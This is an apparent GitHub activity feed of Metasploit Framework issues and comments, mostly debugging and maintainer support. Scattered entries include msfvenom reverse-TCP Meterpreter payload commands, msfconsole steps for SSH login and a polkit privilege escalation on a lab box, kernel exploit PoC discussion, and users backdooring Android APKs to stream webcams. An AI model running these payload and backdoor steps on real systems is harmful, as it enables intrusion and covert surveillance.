[2022-11-02 11:32] JustAnda7 commented on #17204
Hello! I would like to work on this issue.

[2022-11-02 11:37] bcoles commented on #17204
@JustAnda7 assigned to you.

[2022-11-02 12:21] #17169 closed

[2022-11-02 14:29] #17194 closed

[2022-11-02 14:45] RobinLanglois opened #17215 "auxiliary/scanner/http/phpmyadmin_login : URI not friendly"
## Steps to reproduce

1. `use auxiliary/scanner/http/phpmyadmin_login`
2. Fill the different options. If you're using `LAMP`, your path to phpadmin should be `localhost/phpmyadmin`, so you set `TARGETURI` to `/phpmyadmin`
3. You got the error message "PhpMyAdmin is not available"
4. After spending some time, you realize that you need to put a trailing `/` at the end of the URI, e.g `/phpmyadmin/`

[2022-11-02 15:36] cdelafuente-r7 opened #17216 "Kerberos: add `get_ticket_granting_ticket` and `get_service_ticket` support"
Both can be combined in one module with two actions for getting both TGT and TGS tickets.

- get a TGT action: legally request a TGT from the KDC given a password, a NT hash or an encryption key. The resulting TGT will be stored in the cache.
- get a TGS action: legally request a TGS from the KDC given a password, a NT hash, an encryption key or a cached TGT. If the TGT is not provided, it will re

[2022-11-03 01:16] adfoster-r7 commented on #16511
@hantwister Thanks for the update + investigation :+1:

Do you have replication steps available? i.e. target environment/version/locale/etc or whatever's required to replicate locally, a docker setup would be perfect for instance

[2022-11-03 02:50] hantwister commented on #16511
For my testing,

- VM A: Installed OS and mysql-server from `ubuntu-10.04-server-amd64.iso`
- VM B: Installed OS from `ubuntu-22.04-live-server-amd64.iso`, installed [MySQL official repo](https://dev.mysql.com/get/mysql-apt-config_0.8.24-1_all.deb) with dpkg, installed `mysql-server` with apt
- VM C: Installed OS from `ubuntu-22.04-live-server-amd64.iso`, used [MariaDB instructions for adding 10.9

[2022-11-03 14:54] JustAnda7 commented on #17204
Can I contact you @bcoles questions related to the issue if possible?

[2022-11-03 16:09] therobokedi opened #17217 "Stage stuck problem help please"
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.°°.°°:2324
[*] Sending stage (78179 bytes) to 192.168.°°.°°
[-] Meterpreter session 1 is not valid and will be closed
[*] 192.168.°°.°° - Meterpreter session 1 closed.

Help please

[2022-11-03 17:45] jheysel-r7 opened #17218 "zabbix_login scanner does not work on latest zabbix appliance version 6.2.4"
## Summary
Outdated regex.

## Steps to reproduce

1. Download the latest Zabbix appliance from: https://cdn.zabbix.com/zabbix/appliances/stable/6.2/6.2.4/zabbix_appliance-6.2.4-netinstall.iso
1. Spin up the .iso. - In VMWare Fusion select `Other Linux 5.x kernel 64-bit` as the OS give the machine 4 cores and 8 GB ram (likely a bit overkill but before the VM was crashing for me durning boot prior

[2022-11-03 19:15] solardiz commented on #17200
Hi @jvoisin. What is your mention that this bypasses LKRG based on - e.g., your own testing, your own analysis, some third-party reference? We (LKRG developers) couldn't easily get the exploit to work so far (unrelated to LKRG), and by our understanding it might very well be caught by LKRG if it (almost) worked. Thanks. CC: @Adam-pi3

[2022-11-03 19:52] minipli-oss commented on #17200
Yeah, the exploit is really just a PoC, as it exploits a race and thereby can hit a still free/poisoned object and trigger page faults.

You might want to give the [new PoC](https://github.com/opensrcsec/same_type_object_reuse_exploits/blob/main/cve-2022-22942-dc.c) for CVE-2022-22942 a shot. It exploits a similar bug (same-type, same-addr uaf), just using a different type (`struct file` instead o

[2022-11-03 20:18] minipli-oss commented on #17200
And yes, just confirmed LKRG doesn't detect it:
![Bildschirmfoto vom 2022-11-03 21-16-35](https://user-images.githubusercontent.com/65352095/199825319-08a0495a-5e94-4db8-967d-54cf3816f756.png)

[2022-11-03 20:25] solardiz commented on #17200
@minipli-oss Cool, thanks! I'm not surprised LKRG doesn't detect `struct file` reuse - I'd be surprised if it did. However, for `struct cred` it could be different, because LKRG maintains its own shadow credentials that it checks live ones against.

The way the CVE-2022-1043 exploit didn't work for us isn't as you describe - rather, it would just sit on the "waiting" step for ages - on my test, un

[2022-11-03 20:45] minipli-oss commented on #17200
Well, the CPU pinning is needed, for reasons mentioned in the [comment](https://github.com/opensrcsec/same_type_object_reuse_exploits/blob/fd9b891d/cve-2022-1043.c#L231-L233) right in front of it:

[code]

So removing the CPU pinning and running the PoC on a single CPU will likely lead to a kernel panic.

But the real reason why you can't trigger the bug is that your kernel isn't vulnerable. The b

[2022-11-03 21:27] Adam-pi3 commented on #17200
@minipli-oss would you be able to share what was exact kernel which you were testing against CVE-2022-1043
 (https://github.com/opensrcsec/same_type_object_reuse_exploits/blob/main/cve-2022-1043.c) exploit? As @solardiz mentioned we had some troubles with reproducing it. That being said, I was able to generate NULL deref under the following ubuntu kernel:
https://kernel.ubuntu.com/~kernel-ppa/main

[2022-11-03 21:49] minipli-oss commented on #17200
As mentioned in the [blog](https://grsecurity.net/exploiting_and_defending_against_same_type_object_reuse), I was testing the PoC for CVE-2022-1043 on a modified grsecurity kernel with the commit fixing the bug reverted. I didn't found a distro kernel I could use for demonstration purposes, so I used my own. You can probably do the same?

[2022-11-03 23:30] #17217 closed

[2022-11-03 23:35] #17218 closed

[2022-11-04 03:25] JustAnda7 commented on #17204
Could you please explain what the '_PATH' options for these type of payloads be?
[https://github.com/rapid7/metasploit-framework/blob/master/modules/payloads/singles/cmd/unix/bind_netcat_gaping_ipv6.rb](url) and [https://github.com/rapid7/metasploit-framework/blob/master/modules/payloads/singles/cmd/windows/adduser.rb](url)

[2022-11-04 03:53] bcoles commented on #17204
A `_PATH` option is only suitable for some payloads.

For `modules/payloads/singles/cmd/windows/adduser.rb`, adding a path option is probably more confusing than helpful.

For `modules/payloads/singles/cmd/unix/bind_netcat_gaping_ipv6.rb`, the generated payload executes `nc` :

https://github.com/rapid7/metasploit-framework/blob/772cf99d368882bec24bc33763bb86f4737fa70b/modules/payloads/singles/cmd

[2022-11-04 04:30] JustAnda7 commented on #17204
So the default value of the  `_PATH` option should be the execution command.
For example, `TELNETD_PATH` with a default value of `telnetd` in
[https://github.com/rapid7/metasploit-framework/blob/master/modules/payloads/singles/cmd/unix/bind_busybox_telnetd.rb](url)

[2022-11-04 04:36] bcoles commented on #17204
By default, the `*_PATH` value should simply be the executable name (as per the `jjs` example above) as the most reliable default value. This also ensures consistency with existing behaviour.

Yes.

Care should be taken to ensure that the chosen option name will not conflict with existing module options. `grep -rn TELNETD_PATH modules/`

[2022-11-04 13:11] solardiz commented on #17200
@minipli-oss BTW, you can possibly load LKRG on top of that "modified grsecurity kernel with the commit fixing the bug reverted." We did try supporting LKRG on top of grsecurity at some point, but we did not retest that for a long time - especially as we have no access to non-public grsecurity kernels.

[2022-11-04 14:58] nobiDebian opened #17224 "i started a listener but its not opening sessions"
I manually embedded a payload into original apk and i also  use my router as a portforwading. but when im starting a listener it doesn't open any sessions, even if i open the payload app into my second device. Can you guys help me? Btw im using Kali Nethunter

[2022-11-04 15:22] JustAnda7 commented on #17204
Can the same `_PATH` option be used multiple time in modules?
For example, `NC_PATH` with default value of `nc` in [https://github.com/rapid7/metasploit-framework/blob/master/modules/payloads/singles/cmd/unix/bind_netcat.rb](url) and [https://github.com/rapid7/metasploit-framework/blob/master/modules/payloads/singles/cmd/unix/bind_netcat_gaping.rb](url)

[2022-11-04 15:48] minipli-oss commented on #17200
I spent some time today to adapt the PoC for Ubuntu. User namespaces and AppArmor threw a wrench or two into the play, but I figured how to work around these and pushed the result just yet: https://github.com/opensrcsec/same_type_object_reuse_exploits/commit/6c0deebe30bef9ee67877b742dbdd1e760599778. Feel free to reproduce!

I used Ubuntu 20.10 with that kernel: https://kernel.ubuntu.com/~kernel-pp

[2022-11-04 17:14] solardiz commented on #17200
Thank you very much, @minipli-oss!

Regarding those difficulties getting LKRG to build, am I correct to assume they applied to building an out-of-tree module in general, and not LKRG specifically? LKRG just builds on typical systems like Ubuntu for us.

There is explicit `put_cred` inside `p_cmp_tasks`, which is called from `p_validate_task_f`:

[code]

and then:

[code]

My guess is some race res

[2022-11-04 17:20] bspengler-oss commented on #17200
"invalid opcode" is expected, it's part of the standard BUG() message which is implemented as a ud2 instruction.

[2022-11-04 17:28] solardiz commented on #17200
Thanks, @bspengler-oss! You're right indeed, and there's the `0f 0b` right in there.

[2022-11-04 17:58] solardiz commented on #17200
What happens on `put_cred` there is probably that it thinks it's dropping the _final_ reference to `current->cred`, and that is quite reasonably not allowed:

[code]

[code]

Why final? Perhaps because the vulnerability was triggered. It's probably similar to what @minipli-oss referred to above:

[code]

except that with LKRG's extra code (and extra usage of `put_cred`) those checks are tripped ev

[2022-11-04 19:07] Signum21 opened #17227 "polkit_dbus_auth_bypass not working"
## Steps to reproduce

1. Open SSH session:
use auxiliary/scanner/ssh/ssh_login
set username tryhackme
set password TryHackMe123!
set rhosts TRYHACKME_MACHINE_IP
run

2. Run exploit:
use exploit/linux/local/polkit_dbus_auth_bypass
set iterations 100
set session 1
set lhost VPN_LOCAL_IP
run

- Local machine informations:
Kali WSL-2
uname -a: Linux DESKTOP-NAME 5.10.102.1-microsoft-standard-WSL2 #&#

[2022-11-04 20:16] minipli-oss commented on #17200
Yeah, it's because `current->cred` is a dangling pointer and the `get/put_cred()` in LKRG make it trigger sanity checks in `kernel/cred.c`, the PoC otherwise carefully tries to avoid (no `setuid()`, no `fork()`,...).

The `BUG_ON()` actually triggers for the `put_cred(p_current_real_cred)` in `p_cmp_tasks()`, i.e. after all checks have passed, apparently, as no LKRG related log message was generat

[2022-11-04 20:18] minipli-oss commented on #17200
re: build issues for LKRG, yes, that was strictly related to me trying to run Ubuntu 20.10 with a kernel build on a much more recent version, using a different version of libc, making all the tools in the kernel-headers package fail to run and needing recompilation. After these had been resolved, LKRG built just fine.

[2022-11-04 22:58] solardiz commented on #17200
That's a good point. I'd have expected some log messages to have been generated. That they were not can mean several things, including (1) that the race was triggered closer to the end of the function (then maybe it'd have been detected more explicitly on the next call) or/and (2) that we have a logic bug/shortcoming preventing detection of that condition or/and (3) that the credentials are not ye

[2022-11-05 05:26] tekwizz123 opened #17230 "Docker Go Version is Outdated and No Longer Supported"
Currently the Docker image uses Go 1.11. If we look at https://endoflife.date/go we can see this is EOL and only Go 1.18 and 1.19 are supported.

We should really look at updating the Go version being used by this image to be supported since its possible that dependencies may start to break if they haven't already.

## Steps to reproduce

View https://github.com/rapid7/metasploit-framework/blob/ma

[2022-11-05 06:19] tekwizz123 commented on #16826
I was actually just looking at this today and I'd love to determine why this is occurring and how we can create a system to build these releases automatically and tag them appropriately. @adfoster-r7 would you be up for syncing up on this next week?

[2022-11-05 08:34] JustAnda7 commented on #17204
Could you hint how to test the changes made ?

[2022-11-05 08:49] bcoles commented on #17204
`use` an exploit module. `set payload <a payload you modified>`. See if the new path option is available when you run `options`.

[2022-11-05 20:56] joaociocca commented on #13483
One other idea is to set an alias, something like `alias msfc='msfconsole -x "setg LHOST <interface>"'`, so that every time you get `msfconsole` started it'll already run the `setg LHOST` command (and by naming it something other than `msfconsole` you can still go for the raw command itself when needed)

[2022-11-05 21:38] adfoster-r7 commented on #13483
You can run `setg lhost <interface>` in conjunction with the `save` command in msfconsole to remember your preferences. Preferences will be stored on disk at ` ~/.msf4/config`

[2022-11-05 22:28] joaociocca commented on #13483
That I didn't know about! Thanks @adfoster-r7 <3

[2022-11-05 23:18] tekwizz123 opened #17231 "Docker Container Missing PostgreSQL"
## Steps to reproduce

[code]
Then opened up the image in Docker Desktop and clicked on the Run button

Btw doing this will fail

[code]

Then inside the container:

[code]

## Were you following a specific guide/tutorial or reading documentation?

Found whilst talking with @sneakerhax r.e why they were building custom Docker images for Metasploit.

## Expected behavior

We should have the default

[2022-11-05 23:24] tekwizz123 commented on #17231
Oh and also to prove that it isn't installed, here is me installing the `postgresql` package using `apk`:

[code]

[2022-11-06 09:18] JustAnda7 commented on #17204
Could you explain what does implementation of this option do ?

[2022-11-06 09:30] bcoles commented on #17204
Exposing a `PATH` option allows the operator to specify the file system path for an executable.

[2022-11-06 09:37] JustAnda7 commented on #17204
Thank you for helping me resolve this issue and clarifying my questions

[2022-11-06 14:41] nobiDebian commented on #9410
cd /home/kali then msfconsole
Once you are in the sessions "webcam_list" it's shows 1 front 2 back then "webcam_stream -i 2"
Then i go to my file then i click the .html and it works for me btw my target device is android and im using kali nethunter

[2022-11-07 14:03] smcintyre-r7 commented on #17199
Meterpreter payloads should be able to reconnect and reestablish their connection if the transports were configured correctly. If that's not the case then I think this is a regression.

[2022-11-07 14:13] #17119 closed

[2022-11-07 15:00] #16993 closed

[2022-11-07 17:33] adfoster-r7 commented on #17227
I haven't confirmed this particular issue, but I know I ran into an issue with the polkit_dbus_auth_bypass module on a different environment where I had to modify this line as the output of `pkexec --version` on the environment was different than the hard coded match:

https://github.com/rapid7/metasploit-framework/blob/455476cfe2a111027169c16c1d01b1d06390f75d/modules/exploits/linux/local/polkit_d

[2022-11-07 18:15] #17121 closed

[2022-11-07 19:18] #17205 closed

[2022-11-07 22:41] Unibrighter commented on #14508
Thanks @T0m-Ph , this really helped me while doing one of the CTF. It's a great tip and glad to see someone who has been in the same situation solved this for the people who will be here in the future. :)

[2022-11-08 03:21] tjnull commented on #17020
Hello there!

I was having this issue for the past two months using the metasploit-framework package that is compiled for Kali Linux.

However, I can confirm the issue is resolved.

It seems the issue was related to the Kali metasploit-framework package utilizing OpenSSL 3.0 and it was pulling the libraries it needed to utilize different versions of SSL. The current version of OpenSSL in Kali Linu

[2022-11-08 10:37] Dinamitrii opened #17237 "using msfdb on windows 11 failed"
[code]

Edition	Windows 11 Pro
Version	21H2
Installed on	‎1.‎10.‎2022 ‎г.
OS build	22000.1165
Experience	Windows Feature Experience Pack 1000.22000.1165.0

postgresql 15 latest

[2022-11-08 17:46] gwillcox-r7 commented on #17237
Unclear if this stack trace is occurring because you CTRL+C'd in the middle of something, in which case we would expect an error trace to occur.

You output also mentions `[!] Attempt to create DB socket file at Temporary Directory and `~/.msf4/db` failed. Possibly because they are mounted with NOEXEC flags. Database initialization failed.` which likely means that you might need to update the loca

[2022-11-08 18:53] Nellyjay22 opened #17241 "Am encountering a cpu firebase Mozilla 5.0 login on my gmail please I want a refix"
## Steps to reproduce

How'd you do it?

1. ...
2. ...

This section should also tell us any relevant information about the
environment; for example, if an exploit that used to work is failing,
tell us the victim operating system and service versions.

## Were you following a specific guide/tutorial or reading documentation?

If yes link the guide/tutorial or documentation you were following here,

[2022-11-08 23:41] #17241 closed

[2022-11-09 02:47] tjnull commented on #17020
I stand corrected. It seems the issue is still in the packaged version that Kali Linux builds. Comparing the package that the Kali Linux team compiles shows the metasploit-framework is trying to use the OpenSSL 3 libraries but the libraries it needs do not exist.

Using the compiled package from apt.metasploit.com

apt.metasploit.com/pool/main/m/metasploit-framework/metasploit-framework_6.2.26+202

[2022-11-09 09:14] JustAnda7 commented on #17212
Is anyone working on this issue? If not, I would like to contribute to this issue.

[2022-11-09 09:19] JustAnda7 commented on #17158
I would like to work on this issue

[2022-11-09 09:40] Dorabot2222 commented on #16338
Same error

[2022-11-09 09:42] Dinamitrii commented on #17237
This morning`s

PS D:\metasploit-framework\bin> .\msfupdate.ps1
Downloading latest Metasploit Framework
Updating Metasploit Framework
Update Complete
PS D:\metasploit-framework\bin> .\msfdb.bat reinit --component database --use-defaults
D:/metasploit-framework/embedded/lib/ruby/gems/3.0.0/gems/rex-core-0.1.28/lib/rex/compat.rb:378: warning: Win32API is deprecated after Ruby 1.9.1; use fiddle direc

[2022-11-09 12:27] adfoster-r7 commented on #17020
Rapid7's nightly builders bundle with openssl 1.1.1 with msfconsole - you can see the currently used openssl library version in msfconsole with:

[code]

Metasploit should work transparently with both openssl 1 and 3 - we just happen to bundle 1.1.1 by default still

@tjnull If there's exact replication steps for this issue we should be able to fix it, i.e. from best to worst - if there's a THM/HT

[2022-11-09 14:39] gwillcox-r7 commented on #17212
@JustAnda7 Not presently, so feel free to pick it up. This is why we added the `easy` and `newbie-friendly` tags in a hope that people would be curious in trying to work on this 😄 If you have any questions feel free to reach out, our Slack is at https://metasploit.com/slack and my username there is the same as my GitHub handle.

[2022-11-09 15:12] Signum21 commented on #17227
That's not the error I receive, the user is created successfully, the other two steps fail (password change and user deletion).
Looking at the code the error lines are 395 and 402:

[code]
[code]

[2022-11-09 15:49] M4jx commented on #12630
This problem still occurs. The msfrpcd server lacks proper CORS related HTTP headers such as `Access-Control-Allow-Origin`.
Requesting 127.0.0.1:55553/api/1.0 from Postman or similar tools works because these tools doesn't have the same security as the browsers [see](https://stackoverflow.com/questions/57434665/blocked-by-cors-policy-on-the-browser-working-on-postman).

Example:
Postman/Insomnia =

[2022-11-09 17:13] exploiting-systems opened #17245 "msfvenom did not generate stageless meterpreter in c"
"msfvenom -p windows/meterpreter_reverse_tcp lhost=192.168.56.1 lport=4444 -f c" has no output. It's the same issue with csharp

Kali Linux 2022.2 and 2022.3

I use Kali Linux 2022.1 to avoid this problem but then i can't update my system to newer versions

$ msfvenom -p windows/meterpreter_reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f csharp
[-] No platform was selected, choosing Msf::Module::Plat

[2022-11-09 19:32] #14768 closed

[2022-11-09 21:22] nedlir commented on #9345
_So, I had exactly the same problem, and I know this issue is 5 years old, but this is one of the first results on Google, so hopefully my solution helps others too._

The book is a bit dated and relied on older version of Kali Linux which had old version of PHP preinstalled. The system that the author instructs to use in the book is Kali Linux 1.0.6 which ran with `PHP version 5.4.4`, current ver

[2022-11-09 23:51] jheysel-r7 commented on #17227
Hey @Signum21, thanks for bringing up this issue. I was able to follow your steps above to reproduce this using `auxiliary/scanner/ssh/ssh_login` to start the initial session:

[code]

Depending on `ITERATIONS` and the determined `@cmd_delay` you'll get slightly different outcomes when running the module. After lots of testing the most common outcome was after the `exploit_set_password` was called

[2022-11-10 02:02] bcoles commented on #17224
I suggest verifying your network configuration first. Ensure the port forwarding is working correctly. Try to connect to the listener from a remote host with netcat.

[2022-11-10 05:21] jvarsec opened #17246 "Exploit failed: cmd/unix/python/meterpreter/reverse_tcp: All encoders failed to encode."
Unable to generate an exploit for HackTheBox: Scriptkiddie:
The metasploit on the box is vulnerable to CVE-2020-7384. So to create an apk for reverse-shell.
But I got an error: Exploit failed: cmd/unix/python/meterpreter/reverse_tcp: All encoders failed to encode.

I'm using Kali-Linux on VM

Tried metasploit in different distros still i get same error.

## Steps to reproduce

[code]

Tried with `

[2022-11-10 06:54] gwillcox-r7 opened #17247 "Add in More Complete YARD Documentation"
## Summary

Currently running `yard stats -q` to give the stats on undocumented library functions without any warnings gives the following output as of Thursday, November 10th:

[code]

Only 47.87% of our code is actually documented according to YARD. Keep in mind this does not account for inaccurate documentation which is part of the warnings that we are ignoring here (that is a separate issue be

[2022-11-10 07:30] fastchain commented on #17199
@smcintyre-r7  thank you for your comment, I'll try to reproduce once more. Also may be you know how to create unstaged payloads? Or  recommend direction for research?

[2022-11-10 13:54] sempervictus opened #17248 "Native WMI Exec"
## Summary

AV/EDR are pretty consistently killing psexec in its various formats - not just ours either, the real one too, before we get to even start being evasive with what we deliver... WMI execution however tends to work, but since we use a python shim, it doesn't pivot correctly (with some complications relating to RHOST and the netbios name of the host being contacted). My hope is that the R

[2022-11-10 16:57] JustAnda7 commented on #17212
What access right does `ma` in `bit1 :ma` and `reserved`correspond to and how to test the changes?

[2022-11-10 17:16] gwillcox-r7 commented on #17212
https://github.com/rapid7/metasploit-framework/blob/ed7d458f07f4cab5b7d2e01d1dd431d5e1667e9a/lib/rex/proto/ms_dtyp.rb is the file you are looking for. The link to map the names to the values should be there as one of the reference links.

Specifically the link is https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-dtyp/7a53f60e-e730-4dfe-bbe9-b21b62eb790b and the value `ma` you can se

[2022-11-10 18:06] zeroSteiner opened #17249 "Meterpreters Should No Longer Return TLV_TYPE_ADDR_TYPE When Resolving Hostnames"
Now that https://github.com/rapid7/metasploit-framework/pull/17244 is landed, it's unnecessary for Meterepter's to return the `TLV_TYPE_ADDR_TYPE` when resolving hostnames. It appears to always be the value that was echoed to it and is redundant anways because the address is always 0 bytes long when it failed to resolve, 4 bytes long when it's IPv4 or 16 bytes long when it's IPv6. The information

[2022-11-10 18:11] smcintyre-r7 commented on #17246
Not every payload is compatible with every exploit. Sometimes based on the bad characters, the encoders simply can't modify the payload in such a way to retain the original functionality and bypass the restrictions. The framework does it's best to filter those out proactively, but it's not always able to do that. In this case the framework is correctly stating that the payload is incompatible beca

[2022-11-10 18:11] #17246 closed

[2022-11-10 20:42] Mikivirus1 opened #17250 "Msfconsole command not working. Instead it gives me: warning: win32api is deprecated after ruby 1.9.1, use fiddle instead D:/metasploit - framework/embedded/lib/ruby/3.0.0/open3.rb.221.in 'spawn': no such file or directory - git (error::enoent)"

[2022-11-10 21:35] smcintyre-r7 commented on #17199
The payload that are named `meterpreter_` (as opposed to `meterpreter/`) are not staged. So if you want the unstaged version of `windows/meterpreter/reverse_tcp` you'd use `windows/meterpreter_reverse_tcp` etc.

Not all payloads have an unstaged equivalent, but Meterpreter's coverage is pretty good IIRC.

[2022-11-10 21:57] Mikivirus1 commented on #14457
Any fix to this?

[2022-11-11 00:09] kenaley commented on #12329
it didn't work
Adding metasploit-framework to your repository list..Warning: apt-key is deprecated. Manage keyring files in trusted.gpg.d instead (see apt-key(8)).
OK
Updating package cache..W: http://downloads.metasploit.com/data/releases/metasploit-framework/apt/dists/lucid/InRelease: Key is stored in legacy trusted.gpg keyring (/etc/apt/trusted.gpg), see the DEPRECATION section in apt-key(8) fo

[2022-11-11 00:17] #17250 closed

[2022-11-11 04:18] Mikivirus1 opened #17251 "No such file or directory."
It gives me :

D:/metasploit-frameworl/embedded/lib/ruby/3.0.0/open3.rb:221:in 'spawn' no such file or directory - git (Errno::Enoent)

I downloaded it on D drive as the installer always downloaded it on there, even when I chose C.

I've already disabled my antivirus as well.

What could be the cause of the issue?

[2022-11-11 04:38] bcoles commented on #17251
Something is trying to run the `git` executable for some reason, but it can't find the `git` executable in the system path.

What were you trying to do?

[2022-11-11 05:28] Mikivirus1 commented on #17251
I just ran the command "msfconsole" then it gave me this error

[2022-11-11 05:31] bcoles commented on #17251
Is there more to that stack trace?

[2022-11-11 05:42] Mikivirus1 commented on #17251
Yes, it goes like this.

![IMG_20221111_104223.jpg](https://user-images.githubusercontent.com/117945731/201271650-b0d2ba54-6b1e-4945-a66b-ef32cd7fb700.jpg)
Please help me in any way you can.

[2022-11-11 06:06] bcoles commented on #17251
This looks like a bug. Metasploit should check if `git` is available.

The easiest approach is to ensure Git is installed and the `git` executable is in your system `PATH` environment variable.

Alternatively, you could patch the `modified_files` method in `lib/msf/ui/console/command_dispatcher/developer.rb`.

Alternatively, use Linux or Mac.

[2022-11-11 06:19] Mikivirus1 commented on #17251
Would you recommend using virtual box for Linux?

[2022-11-11 06:26] bcoles commented on #17251
Either VirtualBox (free and open source) or VMware (free for non-commercial use).

[2022-11-11 08:05] JustAnda7 commented on #17212
What access right does `ma` in `bit1 :ma` and `reserved`correspond to and how to test the changes?

[2022-11-11 09:30] adfoster-r7 commented on #17251
Looks like a regression issue caused by https://github.com/rapid7/metasploit-framework/pull/17223

I would echo bcole's suggestion as well, but as a work around comment you can modify the `lib/msf/ui/console/command_dispatcher/developer.rb` file here:

https://github.com/rapid7/metasploit-framework/blob/bcf8c961282861b580581718ae8162821163fd22/lib/msf/ui/console/command_dispatcher/developer.rb#L22

[2022-11-11 14:15] #17251 closed

[2022-11-11 14:16] adfoster-r7 commented on #17251
The fix should be available in the next release, or use one of the two workarounds above - i.e. modifying `lib/msf/ui/console/command_dispatcher/developer.rb` yourself - or using a Kali/Linux VM with Git available.

[2022-11-11 15:12] adfoster-r7 commented on #17247
@gwillcox-r7 Just to confirm - is this meant to have the `newbie-friendly` label applied? 👀

It looks like this task might be quite technical, and an average beginner to Metasploit/Ruby might not feel comfortable reverse engineering undocumented code in that exist in the depths of Metasploit 😄

[2022-11-11 15:30] adfoster-r7 commented on #17245
Looks like a regression in performance; Metasploit 5.0.101 completes in 5 seconds

[code]

Would need to do a bisect to see where the issue has cropped up; I thought it might've been caused by https://github.com/rapid7/rex-text/pull/53 but that doesn't appear to be the case as the commit prior seems to be slow too.

[2022-11-11 15:40] gwillcox-r7 commented on #17247
@adfoster-r7 I added it since in a lot of cases we can at least add the parameters in fairly easily however you are right that a complete set of documentation with an explanation of what the function is doing would likely take a bit longer.

There are however definetely ways to make this significantly easier such as using SourceGraph and the likes to trace the parameters and see where they are bei

[2022-11-11 18:03] SolDikOne opened #17254 "webcam_stream and similar don't work on android backdoor. MSF"
In short, when I entered the webcam_stream command into the meterpreter, (if anything, I created the payload for android - android / meterpreter / reverse_tcp), then I opened the browser and there was a webcam_stream waiting, and then either the meterpreter session crashed, or the command was simply not executed from long waiting times. (This happened with all commands like this - screenshare, web

[2022-11-11 19:26] jeffmcjunkin commented on #15159
Beep boop, I think the inactivity bot closed this one erroneously. Can we re-open?

This is still affecting recent systems -- here's a Windows 10 target example with the output of `systeminfo`:

[code]

Metasploit version:

[code]

[2022-11-11 19:27] jeffmcjunkin commented on #15159
Tagging @adfoster-r7 (like a jerk) since I'm not sure how notifications work on closed issues.

[2022-11-11 22:09] adfoster-r7 commented on #15159
@jeffmcjunkin Thanks for the ping; I grabbed friedrico's pcap and it seems like it might be an issue when using psexec with a local admin. Google's hinting that it might be a difference between using psexec and psexec -i for interactive logons versus network logon - but I haven't found the right gpo/priv incantations to replicate the error

If there's more details for how to create an env to repro

[2022-11-12 13:26] Dinamitrii commented on #17237
after the last update nothing same error again

[2022-11-12 21:56] jwhenry28 commented on #14612
For others who wind up here - if you are testing by downloading your shellcode with a script running from PowerShell ISE, it seems `exitfunc` doesn't matter. I tried running my shellcode in a different application, and it worked fine.

[2022-11-13 09:44] 3V3RYONE commented on #17237
This issue is a possible duplicate of #15980.  `msfdb init` command hangs on windows systems at the line:
`Starting database at ...`
The warning messages thrown are part of new changes (can be ignored on windows), but the root cause of this bug is still as mentioned in the earlier issue.

[2022-11-13 12:47] hawaii67 commented on #14612
To be brief, I tried the payload with many different "applications" and I always get the same behaviour......

[2022-11-13 21:53] Invoke-Mimikatz commented on #17124
I am also having the same problems with reverse port forwards on MSF6. The reverse listener is opened but traffic is not forwarding properly to the "backend" service (in my case, a web server).

<img width="536" alt="image" src="https://user-images.githubusercontent.com/57604669/201546384-8450990d-bc4d-4ce1-a362-681189835920.png">

[2022-11-14 00:52] bcoles opened #17259 "cmd_exec fails on backgrounded Windows shell sessions which were created backgrounded"
`cmd_exec` fails on Windows shell sessions (possibly others) if the session was created backgrounded. Possibly a regression. I recall discussing this before but can't find the issue. Likely an issue with command tokenization.

When running `sessions -u` the architecture detection fails, resulting in "Target is running Windows on an unsupported architecture such as Windows ARM!" error, which is con

[2022-11-14 01:46] bcoles commented on #9511
This issue appears to be fixed for PowerShell sessions. Tested on Windows 7 SP1 (x64) and Windows Server 2016 (x64).

Upgrading the session failed using `sessions -u`. Likewise upgrading the session manually with `post/multi/manage/shell_to_meterpreter` also failed.

However, changing the default `powershell::method` from `reflection` to `net` allowed successful upgrade. Upgrading a PowerShell ses

[2022-11-14 01:46] #9511 closed

[2022-11-14 01:49] adfoster-r7 commented on #17259
Not verified: issue potentially related to https://github.com/rapid7/metasploit-framework/pull/17072

[2022-11-14 14:48] Kingzki commented on #13808
Invalid payload  andriod/meterpreter/reverse_tcp

[2022-11-14 15:00] bcoles commented on #13808
`android`

[2022-11-14 15:00] #16932 closed

[2022-11-14 15:00] #16919 closed

[2022-11-14 16:03] Naiml007 commented on #10062
Type capital LHOST and LPORT

[2022-11-15 05:50] Dinamitrii commented on #17237
so the problem persist after the last update.
is it possible to find out more or some solution?
i tried to set up permissions nothing again.

[2022-11-15 08:04] badboycxcc opened #17262 "New module not added as expected"
## Steps to reproduce

Module Download：https://www.exploit-db.com/exploits/43474

1. wget https://www.exploit-db.com/download/43474 -O /usr/share/metasploit-framewok/module/exploit/linux/http/synology_rce.rb
2. msfconsole
3. reload_all
4. search synology

I can't find a new added module.

## Additional Information
Framework Version: 6.2.27-dev-

[2022-11-15 09:21] Huiicat commented on #11691
the same problem here
the version is
Framework: 6.2.11-dev
Console  : 6.2.11-dev

and I try to use verions 5 with attackbox on tryhackme, it works.
Does verion 6 have some bug here?

[2022-11-15 14:43] Dinamitrii commented on #17237
Same old story.After update process hangs up again on starting database with posssible reason: [!] Attempt to create DB socket file at Temporary Directory and `~/.msf4/db` failed. Possibly because they are mounted with NOEXEC flags. Database initialization failed.
Starting database at C:/Users/k_kar/.msf4/db...

And here again have  to CTRL+C and cannot start database under Windows

[2022-11-15 14:54] gwillcox-r7 commented on #17237
@Dinamitrii The issue appears to possibly be related to the `msfdb` wrapper script as mentioned by bcoles at https://github.com/rapid7/metasploit-framework/issues/15980#issuecomment-1053338008 as was mentioned by @3V3RYONE.

This has been reproduced by team members and will likely require us updating the script, though at this time it is not yet known what has caused this issue. I'll try set up a

[2022-11-15 15:21] #17124 closed

[2022-11-15 15:21] #17158 closed

[2022-11-15 17:21] gwillcox-r7 commented on #17231
Further investigation shows that this is actually meant to be set up using Docker compose. Closing this down as the current behavior is working as intended.

[2022-11-15 17:21] #17231 closed

[2022-11-15 17:35] #17262 closed

[2022-11-15 18:19] CalfCrusher commented on #16355
After 1 year on a Raspberry, msfconsole is totally unstable. It hangs always. 100% CPU all night long

[2022-11-15 19:07] gwillcox-r7 commented on #17237
Alright I'm currently running into _another_ issue with the Omnibus installers so I can't even get around to testing this one 😢 I'll see if I can't get a issue up for that one so long.

[2022-11-15 19:51] adfoster-r7 commented on #16355
@CalfCrusher That sounds like a different problem to the original issue with the database initialisation bug that this ticket is originally about

If you raise a separate issue and describe the symptoms/replication steps etc, there's a higher chance of your issue being resolved

